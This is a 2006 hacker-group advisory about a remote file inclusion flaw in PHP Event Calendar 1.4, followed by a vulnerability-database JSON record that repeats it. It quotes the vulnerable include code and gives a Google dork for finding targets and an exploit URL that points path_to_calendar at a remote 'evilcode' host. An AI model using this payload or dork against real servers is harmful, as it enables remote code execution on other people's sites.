#############################SolpotCrew Community################################
#
# PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion
#
# Vendor site : http://www.softcomplex.com/products/php_event_calendar/
#
#################################################################################
#
#
# Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)
#
# contact: chris_hasibuan@yahoo.com
#
# Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt
#
################################################################################
#
#
# Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja ,
# L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa
# home_edition2001 , Anggands , Rendy , cow_1seng
# and all crew #mardongan @ irc.dal.net
#
#
###############################################################################
Input passed to the "path_to_calendar" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.
code from calendar.php
if(!$path_to_calendar){
$path_to_calendar = $_path_to_calendar;
}
extract($HTTP_POST_VARS);
extract($HTTP_GET_VARS);
include_once $path_to_calendar.'db.php';
function show_calendar($index_calendar='') {
global $db,$path_to_data,$settings;
Google dork : inurl:/cl_files/
exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode
##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################
{"id": "SECURITYVULNS:DOC:13557", "bulletinFamily": "software", "title": "PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion", "description": "#############################SolpotCrew Community################################\r\n#\r\n# PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion \r\n#\r\n# Vendor site : http://www.softcomplex.com/products/php_event_calendar/\r\n#\r\n#################################################################################\r\n#\r\n#\r\n# Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)\r\n#\r\n# contact: chris_hasibuan@yahoo.com \r\n# \r\n# Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt\r\n#\r\n################################################################################\r\n#\r\n#\r\n# Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja , \r\n# L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa\r\n# home_edition2001 , Anggands , Rendy , cow_1seng\r\n# and all crew #mardongan @ irc.dal.net\r\n#\r\n#\r\n###############################################################################\r\nInput passed to the "path_to_calendar" is not properly verified \r\nbefore being used to include files. This can be exploited to execute \r\narbitrary PHP code by including files from local or external resources.\r\n\r\ncode from calendar.php\r\n\r\nif(!$path_to_calendar){\r\n $path_to_calendar = $_path_to_calendar;\r\n}\r\nextract($HTTP_POST_VARS);\r\nextract($HTTP_GET_VARS);\r\ninclude_once $path_to_calendar.'db.php';\r\nfunction show_calendar($index_calendar='') {\r\n global $db,$path_to_data,$settings;\r\n\r\nGoogle dork : inurl:/cl_files/\r\n\r\nexploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode\r\n\r\n\r\n##############################MY LOVE JUST FOR U RIE#########################\r\n######################################E.O.F##################################\r\n\r\n", "published": "2006-07-24T00:00:00", "modified": "2006-07-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13557", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 104, "enchantments": {"score": {"value": 1.5, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6389"]}]}, "exploitation": null, "vulnersScore": 1.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659916711, "score": 1659917426}, "_internal": {"score_hash": "24a2d1101fd1dbc288a58b7b711d6532"}}